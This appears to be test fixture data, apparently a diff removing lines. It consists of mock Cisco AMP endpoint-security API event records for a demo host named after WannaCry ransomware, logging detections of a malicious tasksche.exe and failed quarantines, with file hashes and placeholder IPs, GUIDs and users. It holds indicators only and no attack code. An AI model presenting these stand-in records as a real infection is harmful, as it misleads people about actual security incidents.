-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":3200,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":235000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2708,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":172000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":33000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":891000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":876000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":845000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":798000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":767000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":751000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
